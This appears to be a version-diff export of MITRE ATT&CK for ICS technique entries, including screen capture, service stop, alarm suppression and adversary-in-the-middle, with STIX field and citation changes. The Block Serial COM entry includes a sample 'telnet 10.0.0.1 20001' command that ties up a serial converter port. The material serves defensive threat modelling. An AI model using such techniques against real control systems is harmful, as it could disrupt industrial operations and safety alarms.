external_references[8]['url']https://www.bbc.com/news/technology-36158606https://www.sciencealert.com/multiple-computer-viruses-have-been-discovered-in-this-german-nuclear-plant
external_references[9]['source_name']KGG-ArsSean Gallagher April 2016
external_references[9]['description']Sean Gallagher. (2016, April 27). German nuclear plant’s fuel rod system swarming with old malware. Retrieved October 14, 2019.Sean Gallagher 2016, April 27 German nuclear plants fuel rod system swarming with old malware Retrieved. 2019/10/14
external_references[10]['source_name']KGG-DarkTrend Micro April 2016
external_references[10]['description']Dark Reading Staff. (2016, April 28). German Nuclear Power Plant Infected With Malware. Retrieved October 14, 2019.Trend Micro 2016, April 27 Malware Discovered in German Nuclear Power Plant Retrieved. 2019/10/14
external_references[10]['url']https://www.darkreading.com/endpoint/german-nuclear-power-plant-infected-with-malware/d/d-id/1325298https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/malware-discovered-in-german-nuclear-power-plant

[T0852] Screen Capture

Current version: 1.0

Version changed from: 0.0 → 1.0


Old Description
New Description
t1Adversaries may attempt to perform screen capture of devicest1Adversaries may attempt to perform screen capture of devices
> in the control system environment. Screenshots may be taken> in the control system environment. Screenshots may be taken
> of workstations, HMIs, or other devices that display enviro> of workstations, HMIs, or other devices that display enviro
>nment-relevant process, device, reporting, alarm, or related>nment-relevant process, device, reporting, alarm, or related
> data. These device displays may reveal information regardin> data. These device displays may reveal information regardin
>g the ICS process, layout, control, and related schematics. >g the ICS process, layout, control, and related schematics. 
>In particular, an HMI can provide a lot of important industr>In particular, an HMI can provide a lot of important industr
>ial process information. (Citation: Alert - Russian APTA18>ial process information. (Citation: ICS-CERT October 2017) A
>-074A - 201803) Analysis of screen captures may provide the >nalysis of screen captures may provide the adversary with an
>adversary with an understanding of intended operations and i> understanding of intended operations and interactions betwe
>nteractions between critical devices.>en critical devices.

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['ics-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version1.0
values_changed
STIX FieldOld valueNew Value
modified2021-10-08 15:25:32.143000+00:002022-10-24 15:09:07.609000+00:00
descriptionAdversaries may attempt to perform screen capture of devices in the control system environment. Screenshots may be taken of workstations, HMIs, or other devices that display environment-relevant process, device, reporting, alarm, or related data. These device displays may reveal information regarding the ICS process, layout, control, and related schematics. In particular, an HMI can provide a lot of important industrial process information. (Citation: Alert - Russian APT TA18-074A - 201803) Analysis of screen captures may provide the adversary with an understanding of intended operations and interactions between critical devices.Adversaries may attempt to perform screen capture of devices in the control system environment. Screenshots may be taken of workstations, HMIs, or other devices that display environment-relevant process, device, reporting, alarm, or related data. These device displays may reveal information regarding the ICS process, layout, control, and related schematics. In particular, an HMI can provide a lot of important industrial process information. (Citation: ICS-CERT October 2017) Analysis of screen captures may provide the adversary with an understanding of intended operations and interactions between critical devices.
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Technique/T0852https://attack.mitre.org/techniques/T0852
external_references[1]['source_name']Alert - Russian APT TA18-074A - 201803ICS-CERT October 2017
external_references[1]['description']ICS-CERT. (2017, October 21). Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors. Retrieved October 23, 2017.ICS-CERT 2017, October 21 Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors Retrieved. 2017/10/23

[T0853] Scripting

Current version: 1.0

Version changed from: 0.0 → 1.0


Old Description
New Description
t1Adversaries may use scripting languages to execute arbitraryt1Adversaries may use scripting languages to execute arbitrary
> code in the form of a pre-written script or in the form of > code in the form of a pre-written script or in the form of 
>user-supplied code to an interpreter. Scripting languages ar>user-supplied code to an interpreter. Scripting languages ar
>e programming languages that differ from compiled languages,>e programming languages that differ from compiled languages,
> in that scripting languages use an interpreter, instead of > in that scripting languages use an interpreter, instead of 
>a compiler. These interpreters read and compile part of the >a compiler. These interpreters read and compile part of the 
>source code just before it is executed, as opposed to compil>source code just before it is executed, as opposed to compil
>ers, which compile each and every line of code to an executa>ers, which compile each and every line of code to an executa
>ble file. Scripting allows software developers to run their >ble file. Scripting allows software developers to run their 
>code on any system where the interpreter exists. This way, t>code on any system where the interpreter exists. This way, t
>hey can distribute one package, instead of precompiling exec>hey can distribute one package, instead of precompiling exec
>utables for many different systems. Scripting languages, suc>utables for many different systems. Scripting languages, suc
>h as Python, have their interpreters shipped as a default wi>h as Python, have their interpreters shipped as a default wi
>th many Linux distributions.    In addition to being a usefu>th many Linux distributions.   In addition to being a useful
>l tool for developers and administrators, scripting language> tool for developers and administrators, scripting language 
> interpreters may be abused by the adversary to execute code>interpreters may be abused by the adversary to execute code 
> in the target environment. Due to the nature of scripting l>in the target environment. Due to the nature of scripting la
>anguages, this allows for weaponized code to be deployed to >nguages, this allows for weaponized code to be deployed to a
>a target easily, and leaves open the possibility of on-the-f> target easily, and leaves open the possibility of on-the-fl
>ly scripting to perform a task.>y scripting to perform a task.

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_detection
x_mitre_domains['ics-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version1.0
values_changed
STIX FieldOld valueNew Value
modified2021-10-08 15:25:32.143000+00:002022-09-20 18:18:34.807000+00:00
descriptionAdversaries may use scripting languages to execute arbitrary code in the form of a pre-written script or in the form of user-supplied code to an interpreter. Scripting languages are programming languages that differ from compiled languages, in that scripting languages use an interpreter, instead of a compiler. These interpreters read and compile part of the source code just before it is executed, as opposed to compilers, which compile each and every line of code to an executable file. Scripting allows software developers to run their code on any system where the interpreter exists. This way, they can distribute one package, instead of precompiling executables for many different systems. Scripting languages, such as Python, have their interpreters shipped as a default with many Linux distributions. In addition to being a useful tool for developers and administrators, scripting language interpreters may be abused by the adversary to execute code in the target environment. Due to the nature of scripting languages, this allows for weaponized code to be deployed to a target easily, and leaves open the possibility of on-the-fly scripting to perform a task.Adversaries may use scripting languages to execute arbitrary code in the form of a pre-written script or in the form of user-supplied code to an interpreter. Scripting languages are programming languages that differ from compiled languages, in that scripting languages use an interpreter, instead of a compiler. These interpreters read and compile part of the source code just before it is executed, as opposed to compilers, which compile each and every line of code to an executable file. Scripting allows software developers to run their code on any system where the interpreter exists. This way, they can distribute one package, instead of precompiling executables for many different systems. Scripting languages, such as Python, have their interpreters shipped as a default with many Linux distributions. In addition to being a useful tool for developers and administrators, scripting language interpreters may be abused by the adversary to execute code in the target environment. Due to the nature of scripting languages, this allows for weaponized code to be deployed to a target easily, and leaves open the possibility of on-the-fly scripting to perform a task.
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Technique/T0853https://attack.mitre.org/techniques/T0853

[T0881] Service Stop

Current version: 1.0

Version changed from: 0.0 → 1.0


Old Description
New Description
t1Adversaries may stop or disable services on a system to rendt1Adversaries may stop or disable services on a system to rend
>er those services unavailable to legitimate users. Stopping >er those services unavailable to legitimate users. Stopping 
>critical services can inhibit or stop response to an inciden>critical services can inhibit or stop response to an inciden
>t or aid in the adversary's overall objectives to cause dama>t or aid in the adversary's overall objectives to cause dama
>ge to the environment. (Citation: EAttack Service Stop)  Ser>ge to the environment. (Citation: Enterprise ATT&CK)  Servic
>vices may not allow for modification of their data stores wh>es may not allow for modification of their data stores while
>ile running. Adversaries may stop services in order to condu> running. Adversaries may stop services in order to conduct 
>ct Data Destruction. (Citation: EAttack Service Stop)>Data Destruction. (Citation: Enterprise ATT&CK)

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['ics-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version1.0
values_changed
STIX FieldOld valueNew Value
modified2021-10-08 15:25:32.143000+00:002022-10-24 15:09:07.609000+00:00
descriptionAdversaries may stop or disable services on a system to render those services unavailable to legitimate users. Stopping critical services can inhibit or stop response to an incident or aid in the adversary's overall objectives to cause damage to the environment. (Citation: EAttack Service Stop) Services may not allow for modification of their data stores while running. Adversaries may stop services in order to conduct Data Destruction. (Citation: EAttack Service Stop)Adversaries may stop or disable services on a system to render those services unavailable to legitimate users. Stopping critical services can inhibit or stop response to an incident or aid in the adversary's overall objectives to cause damage to the environment. (Citation: Enterprise ATT&CK) Services may not allow for modification of their data stores while running. Adversaries may stop services in order to conduct Data Destruction. (Citation: Enterprise ATT&CK)
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Technique/T0881https://attack.mitre.org/techniques/T0881
external_references[1]['source_name']EAttack Service StopEnterprise ATT&CK
external_references[1]['description']Enterprise ATT&CK. (n.d.). Service Stop. Retrieved October 29, 2019.Enterprise ATT&CK Service Stop Retrieved. 2019/10/29
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Enterprise ATT&CK', 'description': 'Enterprise ATT&CK Enterprise ATT&CK Service Stop Retrieved. 2019/10/29 Service Stop Retrieved. 2019/10/29 ', 'url': 'https://attack.mitre.org/techniques/T1489/'}

[T0869] Standard Application Layer Protocol

Current version: 1.0

Version changed from: 0.0 → 1.0

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['ics-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version1.0
values_changed
STIX FieldOld valueNew Value
modified2021-10-08 15:25:32.143000+00:002022-10-24 15:09:07.609000+00:00
descriptionAdversaries may establish command and control capabilities over commonly used application layer protocols such as HTTP(S), OPC, RDP, telnet, DNP3, and modbus. These protocols may be used to disguise adversary actions as benign network traffic. Standard protocols may be seen on their associated port or in some cases over a non-standard port. Adversaries may use these protocols to reach out of the network for command and control, or in some cases to other infected devices within the network.Adversaries may establish command and control capabilities over commonly used application layer protocols such as HTTP(S), OPC, RDP, telnet, DNP3, and modbus. These protocols may be used to disguise adversary actions as benign network traffic. Standard protocols may be seen on their associated port or in some cases over a non-standard port. Adversaries may use these protocols to reach out of the network for command and control, or in some cases to other infected devices within the network.
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Technique/T0869https://attack.mitre.org/techniques/T0869

[T0882] Theft of Operational Information

Current version: 1.0

Version changed from: 0.0 → 1.0


Old Description
New Description
t1Adversaries may steal operational information on a productiot1Adversaries may steal operational information on a productio
>n environment as a direct mission outcome for personal gain >n environment as a direct mission outcome for personal gain 
>or to inform future operations. This information may include>or to inform future operations. This information may include
> design documents, schedules, rotational data, or similar ar> design documents, schedules, rotational data, or similar ar
>tifacts that provide insight on operations.   In the Bowman >tifacts that provide insight on operations.    In the Bowman
>Dam incident, adversaries probed systems for operational dat> Dam incident, adversaries probed systems for operational da
>a. (Citation: Bowman Dam - Times) (Citation: Bowman Dam - wa>ta. (Citation: Mark Thompson March 2016) (Citation: Danny Ya
>ll street journal)>dron December 2015)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['ics-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version1.0
values_changed
STIX FieldOld valueNew Value
modified2021-10-11 16:22:12.527000+00:002022-10-24 15:09:07.609000+00:00
descriptionAdversaries may steal operational information on a production environment as a direct mission outcome for personal gain or to inform future operations. This information may include design documents, schedules, rotational data, or similar artifacts that provide insight on operations. In the Bowman Dam incident, adversaries probed systems for operational data. (Citation: Bowman Dam - Times) (Citation: Bowman Dam - wall street journal)Adversaries may steal operational information on a production environment as a direct mission outcome for personal gain or to inform future operations. This information may include design documents, schedules, rotational data, or similar artifacts that provide insight on operations. In the Bowman Dam incident, adversaries probed systems for operational data. (Citation: Mark Thompson March 2016) (Citation: Danny Yadron December 2015)
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Technique/T0882https://attack.mitre.org/techniques/T0882
external_references[1]['source_name']Bowman Dam - TimesMark Thompson March 2016
external_references[1]['description']Mark Thompson. (2016, March 24). Iranian Cyber Attack on New York Dam Shows Future of War. Retrieved November 7, 2019.Mark Thompson 2016, March 24 Iranian Cyber Attack on New York Dam Shows Future of War Retrieved. 2019/11/07
external_references[2]['source_name']Bowman Dam - wall street journalDanny Yadron December 2015
external_references[2]['description']Danny Yadron. (2015, December 20). Iranian Hackers Infiltrated New York Dam in 2013. Retrieved November 7, 2019.Danny Yadron 2015, December 20 Iranian Hackers Infiltrated New York Dam in 2013 Retrieved. 2019/11/07
Other Version Changes

[T0830] Adversary-in-the-Middle

Current version: 2.0

Version changed from: 0.0 → 2.0


Old Description
New Description
t1Adversaries with privileged network access may seek to modift1Adversaries with privileged network access may seek to modif
>y network traffic in real time using man-in-the-middle (MITM>y network traffic in real time using adversary-in-the-middle
>) attacks. (Citation: Reference - SANS - 201710) This type o> (AiTM) attacks. (Citation: Gabriel Sanchez October 2017) Th
>f attack allows the adversary to intercept traffic to and/or>is type of attack allows the adversary to intercept traffic 
> from a particular device on the network. If a MITM attack i>to and/or from a particular device on the network. If a AiTM
>s established, then the adversary has the ability to block, > attack is established, then the adversary has the ability t
>log, modify, or inject traffic into the communication stream>o block, log, modify, or inject traffic into the communicati
>. There are several ways to accomplish this attack, but some>on stream. There are several ways to accomplish this attack,
> of the most-common are Address Resolution Protocol (ARP) po> but some of the most-common are Address Resolution Protocol
>isoning and the use of a proxy. (Citation: Research - Resear> (ARP) poisoning and the use of a proxy. (Citation: Bonnie Z
>ch - Taxonomy Cyber Attacks on SCADA)                    A M>hu, Anthony Joseph, Shankar Sastry 2011)    AAiTM attack m
>ITM attack may allow an adversary to perform the following a>ay allow an adversary to perform the following attacks:   [B
>ttacks:   Block Reporting Message, Spoof Reporting Message, >lock Reporting Message](https://attack.mitre.org/techniques/
>Modify Parameter, Unauthorized Command Message>T0804)[Spoof Reporting Message](https://attack.mitre.org/t
 >echniques/T0856)[Modify Parameter](https://attack.mitre.or
 >g/techniques/T0836)[Unauthorized Command Message](https://
 >attack.mitre.org/techniques/T0855)

New Mitigations:

Dropped Mitigations:

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_detection
x_mitre_domains['ics-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version2.0
values_changed
STIX FieldOld valueNew Value
modified2021-10-08 15:25:32.143000+00:002022-09-26 20:38:32.749000+00:00
nameMan in the MiddleAdversary-in-the-Middle
descriptionAdversaries with privileged network access may seek to modify network traffic in real time using man-in-the-middle (MITM) attacks. (Citation: Reference - SANS - 201710) This type of attack allows the adversary to intercept traffic to and/or from a particular device on the network. If a MITM attack is established, then the adversary has the ability to block, log, modify, or inject traffic into the communication stream. There are several ways to accomplish this attack, but some of the most-common are Address Resolution Protocol (ARP) poisoning and the use of a proxy. (Citation: Research - Research - Taxonomy Cyber Attacks on SCADA) A MITM attack may allow an adversary to perform the following attacks: Block Reporting Message, Spoof Reporting Message, Modify Parameter, Unauthorized Command MessageAdversaries with privileged network access may seek to modify network traffic in real time using adversary-in-the-middle (AiTM) attacks. (Citation: Gabriel Sanchez October 2017) This type of attack allows the adversary to intercept traffic to and/or from a particular device on the network. If a AiTM attack is established, then the adversary has the ability to block, log, modify, or inject traffic into the communication stream. There are several ways to accomplish this attack, but some of the most-common are Address Resolution Protocol (ARP) poisoning and the use of a proxy. (Citation: Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011) An AiTM attack may allow an adversary to perform the following attacks: [Block Reporting Message](https://attack.mitre.org/techniques/T0804), [Spoof Reporting Message](https://attack.mitre.org/techniques/T0856), [Modify Parameter](https://attack.mitre.org/techniques/T0836), [Unauthorized Command Message](https://attack.mitre.org/techniques/T0855)
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Technique/T0830https://attack.mitre.org/techniques/T0830
external_references[1]['source_name']Research - Research - Taxonomy Cyber Attacks on SCADABonnie Zhu, Anthony Joseph, Shankar Sastry 2011
external_references[1]['description']Bonnie Zhu, Anthony Joseph, Shankar Sastry. (2011). A Taxonomy of Cyber Attacks on SCADA Systems. Retrieved January 12, 2018.Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011 A Taxonomy of Cyber Attacks on SCADA Systems Retrieved. 2018/01/12
external_references[2]['source_name']Reference - SANS - 201710Gabriel Sanchez October 2017
external_references[2]['description']Gabriel Sanchez. (2017, October). Man-In-The-Middle Attack Against Modbus TCP Illustrated with Wireshark. Retrieved January 5, 2020.Gabriel Sanchez 2017, October Man-In-The-Middle Attack Against Modbus TCP Illustrated with Wireshark Retrieved. 2020/01/05

[T0878] Alarm Suppression

Current version: 1.1

Version changed from: 0.0 → 1.1


Old Description
New Description
t1Adversaries may target protection function alarms to preventt1Adversaries may target protection function alarms to prevent
> them from notifying operators of critical conditions. Alarm> them from notifying operators of critical conditions. Alarm
> messages may be a part of an overall reporting system and o> messages may be a part of an overall reporting system and o
>f particular interest for adversaries. Disruption of the ala>f particular interest for adversaries. Disruption of the ala
>rm system does not imply the disruption of the reporting sys>rm system does not imply the disruption of the reporting sys
>tem as a whole.   In the Maroochy Attack, the adversary supp>tem as a whole.  A Secura presentation on targeting OT notes
>ressed alarm reporting to the central computer. (Citation: M> a dual fold goal for adversaries attempting alarm suppressi
>aroochy - MITRE - 200808)  A Secura presentation on targetin>on: prevent outgoing alarms from being raised and prevent in
>g OT notes a dual fold goal for adversaries attempting alarm>coming alarms from being responded to. (Citation: Jos Wetzel
> suppression: prevent outgoing alarms from being raised and >s, Marina Krotofil 2019) The method of suppression may great
>prevent incoming alarms from being responded to. (Citation: >ly depend on the type of alarm in question:    * An alarm ra
>References - Secura - 2019) The method of suppression may gr>ised by a protocol message  * An alarm signaled with I/O  * 
>eatly depend on the type of alarm in question:  * An alarm r>An alarm bit set in a flag (and read)   In ICS environments,
>aised by a protocol message * An alarm signaled with I/O * A> the adversary may have to suppress or contend with multiple
>n alarm bit set in a flag (and read)  In ICS environments, t> alarms and/or alarm propagation to achieve a specific goal 
>he adversary may have to suppress or contend with multiple a>to evade detection or prevent intended responses from occurr
>larms and/or alarm propagation to achieve a specific goal to>ing. (Citation: Jos Wetzels, Marina Krotofil 2019)  Methods 
> evade detection or prevent intended responses from occurrin>of suppression may involve tampering or altering device disp
>g. (Citation: References - Secura - 2019) Methods of suppres>lays and logs, modifying in memory code to fixed values, or 
>sion may involve tampering or altering device displays and l>even tampering with assembly level instruction code.  In the
>ogs, modifying in memory code to fixed values, or even tampe> Maroochy Shire attack, the adversary suppressed alarm repor
>ring with assembly level instruction code.>ting to the central computer.(Citation: Marshall Abrams July
 > 2008)

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_detection
x_mitre_domains['ics-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version1.1
values_changed
STIX FieldOld valueNew Value
modified2021-10-08 13:04:01.612000+00:002022-10-20 18:15:39.012000+00:00
descriptionAdversaries may target protection function alarms to prevent them from notifying operators of critical conditions. Alarm messages may be a part of an overall reporting system and of particular interest for adversaries. Disruption of the alarm system does not imply the disruption of the reporting system as a whole. In the Maroochy Attack, the adversary suppressed alarm reporting to the central computer. (Citation: Maroochy - MITRE - 200808) A Secura presentation on targeting OT notes a dual fold goal for adversaries attempting alarm suppression: prevent outgoing alarms from being raised and prevent incoming alarms from being responded to. (Citation: References - Secura - 2019) The method of suppression may greatly depend on the type of alarm in question: * An alarm raised by a protocol message * An alarm signaled with I/O * An alarm bit set in a flag (and read) In ICS environments, the adversary may have to suppress or contend with multiple alarms and/or alarm propagation to achieve a specific goal to evade detection or prevent intended responses from occurring. (Citation: References - Secura - 2019) Methods of suppression may involve tampering or altering device displays and logs, modifying in memory code to fixed values, or even tampering with assembly level instruction code.Adversaries may target protection function alarms to prevent them from notifying operators of critical conditions. Alarm messages may be a part of an overall reporting system and of particular interest for adversaries. Disruption of the alarm system does not imply the disruption of the reporting system as a whole. A Secura presentation on targeting OT notes a dual fold goal for adversaries attempting alarm suppression: prevent outgoing alarms from being raised and prevent incoming alarms from being responded to. (Citation: Jos Wetzels, Marina Krotofil 2019) The method of suppression may greatly depend on the type of alarm in question: * An alarm raised by a protocol message * An alarm signaled with I/O * An alarm bit set in a flag (and read) In ICS environments, the adversary may have to suppress or contend with multiple alarms and/or alarm propagation to achieve a specific goal to evade detection or prevent intended responses from occurring. (Citation: Jos Wetzels, Marina Krotofil 2019) Methods of suppression may involve tampering or altering device displays and logs, modifying in memory code to fixed values, or even tampering with assembly level instruction code. In the Maroochy Shire attack, the adversary suppressed alarm reporting to the central computer.(Citation: Marshall Abrams July 2008)
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Technique/T0878https://attack.mitre.org/techniques/T0878
external_references[1]['source_name']Maroochy - MITRE - 200808Jos Wetzels, Marina Krotofil 2019
external_references[1]['description']Marshall Abrams. (2008, July 23). Malicious Control System Cyber Security Attack Case Study– Maroochy Water Services, Australia. Retrieved March 27, 2018.Jos Wetzels, Marina Krotofil 2019 A Diet of Poisoned Fruit: Designing Implants & OT Payloads for ICS Embedded Devices Retrieved. 2019/11/01
external_references[1]['url']https://www.mitre.org/sites/default/files/pdf/08%201145.pdfhttps://troopers.de/downloads/troopers19/TROOPERS19_NGI_IoT_diet_poisoned_fruit.pdf
external_references[2]['source_name']References - Secura - 2019Marshall Abrams July 2008
external_references[2]['description']Jos Wetzels, Marina Krotofil. (2019). A Diet of Poisoned Fruit: Designing Implants & OT Payloads for ICS Embedded Devices. Retrieved November 1, 2019.Marshall Abrams 2008, July 23 Malicious Control System Cyber Security Attack Case Study Maroochy Water Services, Australia Retrieved. 2018/03/27
external_references[2]['url']https://troopers.de/downloads/troopers19/TROOPERS19%20NGI%20IoT%20diet%20poisoned%20fruit.pdfhttps://web.archive.org/web/20200802103218/https://www.mitre.org/sites/default/files/pdf/08_1145.pdf

[T0805] Block Serial COM

Current version: 1.1

Version changed from: 0.0 → 1.1


Old Description
New Description
t1Adversaries may block access to serial COM to prevent instrut1Adversaries may block access to serial COM to prevent instru
>ctions or configurations from reaching target devices. Seria>ctions or configurations from reaching target devices. Seria
>l Communication ports (COM) allow communication with control>l Communication ports (COM) allow communication with control
> system devices. Devices can receive command and configurati> system devices. Devices can receive command and configurati
>on messages over such serial COM. Devices also use serial CO>on messages over such serial COM. Devices also use serial CO
>M to send command and reporting messages. Blocking device se>M to send command and reporting messages. Blocking device se
>rial COM may also block command messages and block reporting>rial COM may also block command messages and block reporting
> messages.   A serial to Ethernet converter is often connect> messages.   A serial to Ethernet converter is often connect
>ed to a serial COM to facilitate communication between seria>ed to a serial COM to facilitate communication between seria
>l and Ethernet devices. One approach to blocking a serial CO>l and Ethernet devices. One approach to blocking a serial CO
>M would be to create and hold open a TCP session with the Et>M would be to create and hold open a TCP session with the Et
>hernet side of the converter. A serial to Ethernet converter>hernet side of the converter. A serial to Ethernet converter
> may have a few ports open to facilitate multiple communicat> may have a few ports open to facilitate multiple communicat
>ions. For example, if there are three serial COM available ->ions. For example, if there are three serial COM available -
>- 1, 2 and 3 --, the converter might be listening on the cor>- 1, 2 and 3 --, the converter might be listening on the cor
>responding ports 20001, 20002, and 20003. If a TCP/IP connec>responding ports 20001, 20002, and 20003. If a TCP/IP connec
>tion is opened with one of these ports and held open, then t>tion is opened with one of these ports and held open, then t
>he port will be unavailable for use by another party. One wa>he port will be unavailable for use by another party. One wa
>y the adversary could achieve this would be to initiate a TC>y the adversary could achieve this would be to initiate a TC
>P session with the serial to Ethernet converter at <code>10.>P session with the serial to Ethernet converter at 10.0.0.1 
>0.0.1</code> via Telnet on serial port 1 with the following >via Telnet on serial port 1 with the following command: teln
>command: <code>telnet 10.0.0.1 20001</code>.>et 10.0.0.1 20001.

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_detection
x_mitre_domains['ics-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version1.1
values_changed
STIX FieldOld valueNew Value
modified2021-10-08 13:04:01.612000+00:002022-10-20 21:02:54.674000+00:00
descriptionAdversaries may block access to serial COM to prevent instructions or configurations from reaching target devices. Serial Communication ports (COM) allow communication with control system devices. Devices can receive command and configuration messages over such serial COM. Devices also use serial COM to send command and reporting messages. Blocking device serial COM may also block command messages and block reporting messages. A serial to Ethernet converter is often connected to a serial COM to facilitate communication between serial and Ethernet devices. One approach to blocking a serial COM would be to create and hold open a TCP session with the Ethernet side of the converter. A serial to Ethernet converter may have a few ports open to facilitate multiple communications. For example, if there are three serial COM available -- 1, 2 and 3 --, the converter might be listening on the corresponding ports 20001, 20002, and 20003. If a TCP/IP connection is opened with one of these ports and held open, then the port will be unavailable for use by another party. One way the adversary could achieve this would be to initiate a TCP session with the serial to Ethernet converter at 10.0.0.1 via Telnet on serial port 1 with the following command: telnet 10.0.0.1 20001.Adversaries may block access to serial COM to prevent instructions or configurations from reaching target devices. Serial Communication ports (COM) allow communication with control system devices. Devices can receive command and configuration messages over such serial COM. Devices also use serial COM to send command and reporting messages. Blocking device serial COM may also block command messages and block reporting messages. A serial to Ethernet converter is often connected to a serial COM to facilitate communication between serial and Ethernet devices. One approach to blocking a serial COM would be to create and hold open a TCP session with the Ethernet side of the converter. A serial to Ethernet converter may have a few ports open to facilitate multiple communications. For example, if there are three serial COM available -- 1, 2 and 3 --, the converter might be listening on the corresponding ports 20001, 20002, and 20003. If a TCP/IP connection is opened with one of these ports and held open, then the port will be unavailable for use by another party. One way the adversary could achieve this would be to initiate a TCP session with the serial to Ethernet converter at 10.0.0.1 via Telnet on serial port 1 with the following command: telnet 10.0.0.1 20001.
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Technique/T0805https://attack.mitre.org/techniques/T0805

[T0807] Command-Line Interface

Current version: 1.1

Version changed from: 0.0 → 1.1


Old Description
New Description
t1Adversaries may utilize command-line interfaces (CLIs) to int1Adversaries may utilize command-line interfaces (CLIs) to in
>teract with systems and execute commands. CLIs provide a mea>teract with systems and execute commands. CLIs provide a mea
>ns of interacting with computer systems and are a common fea>ns of interacting with computer systems and are a common fea
>ture across many types of platforms and devices within contr>ture across many types of platforms and devices within contr
>ol systems environments. (Citation: EAttack Command-Line Int>ol systems environments. (Citation: Enterprise ATT&CK Januar
>erface) Adversaries may also use CLIs to install and run new>y 2018) Adversaries may also use CLIs to install and run new
> software, including malicious tools that may be installed o> software, including malicious tools that may be installed o
>ver the course of an operation.  CLIs are typically accessed>ver the course of an operation.  CLIs are typically accessed
> locally, but can also be exposed via services, such as SSH,> locally, but can also be exposed via services, such as SSH,
> Telnet, and RDP.  Commands that are executed in the CLI exe> Telnet, and RDP.  Commands that are executed in the CLI exe
>cute with the current permissions level of the process runni>cute with the current permissions level of the process runni
>ng the terminal emulator, unless the command specifies a cha>ng the terminal emulator, unless the command specifies a cha
>nge in permissions context.  Many controllers have CLI inter>nge in permissions context. Many controllers have CLI interf
>faces for management purposes.  Detection: Command-line inte>aces for management purposes.
>rface activities can be captured through proper logging of p 
>rocess execution with command-line arguments. This informati 
>on can be useful in gaining additional insight to adversarie 
>s' actions through how they use native processes or custom t 
>ools. 

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_detection
x_mitre_domains['ics-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version1.1
values_changed
STIX FieldOld valueNew Value
modified2021-10-08 13:04:01.612000+00:002022-09-27 15:30:18.702000+00:00
descriptionAdversaries may utilize command-line interfaces (CLIs) to interact with systems and execute commands. CLIs provide a means of interacting with computer systems and are a common feature across many types of platforms and devices within control systems environments. (Citation: EAttack Command-Line Interface) Adversaries may also use CLIs to install and run new software, including malicious tools that may be installed over the course of an operation. CLIs are typically accessed locally, but can also be exposed via services, such as SSH, Telnet, and RDP. Commands that are executed in the CLI execute with the current permissions level of the process running the terminal emulator, unless the command specifies a change in permissions context. Many controllers have CLI interfaces for management purposes. Detection: Command-line interface activities can be captured through proper logging of process execution with command-line arguments. This information can be useful in gaining additional insight to adversaries' actions through how they use native processes or custom tools.Adversaries may utilize command-line interfaces (CLIs) to interact with systems and execute commands. CLIs provide a means of interacting with computer systems and are a common feature across many types of platforms and devices within control systems environments. (Citation: Enterprise ATT&CK January 2018) Adversaries may also use CLIs to install and run new software, including malicious tools that may be installed over the course of an operation. CLIs are typically accessed locally, but can also be exposed via services, such as SSH, Telnet, and RDP. Commands that are executed in the CLI execute with the current permissions level of the process running the terminal emulator, unless the command specifies a change in permissions context. Many controllers have CLI interfaces for management purposes.
